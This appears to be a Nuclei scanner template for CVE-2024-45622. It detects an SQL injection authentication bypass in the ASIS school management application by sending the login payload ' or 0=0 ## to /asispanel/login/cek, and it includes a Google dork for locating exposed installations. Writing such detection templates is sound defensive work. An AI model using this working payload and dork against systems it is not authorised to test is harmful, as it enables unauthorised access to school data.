id: CVE-2024-45622 info: name: ASIS - SQL Injection Authentication Bypass author: s4e-io severity: critical description: | ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass. reference: - https://github.com/atoz-chevara/cve/blob/main/2024/ASIS_AplikasiSistemSekolah_Using_CodeIgniter3-SQL_Injection_Authentication_Bypass.md - https://packetstormsecurity.com/files/181355/ASIS-3.2.0-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2024-45622 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-45622 cwe-id: CWE-89 epss-score: 0.00043 epss-percentile: 0.09586 cpe: cpe:2.3:a:asis:asis:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: asis product: asis google-dork: "ASIS | Aplikasi Sistem Sekolah" tags: cve,cve2024,asis,auth-bypass,sqli variables: pass: "{{rand_base(10)}}" flow: http(1) && http(2) && http(3) http: - raw: - | GET /asispanel/ HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body,"ASIS | Aplikasi Sistem Sekolah ")' - 'status_code == 200' condition: and internal: true - raw: - | POST /asispanel/login/cek HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=%27+or+0%3D0+%23%23&password={{pass}}&submit=&submit= matchers: - type: dsl dsl: - 'status_code == 303' condition: and internal: true - raw: - | GET /asispanel/home HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body, "Logout")' - 'status_code == 200' condition: and # digest: 490a0046304402202210e8811dba09cd1be778add18893fc1a6f98680e9dbd8e751fc6fc06bc1b1f02206c9bda0399c938d49499fcb1722fd1b8507e823654e2a0433eee109bb6947fe9:922c64590222798bb761d5b6d8e72950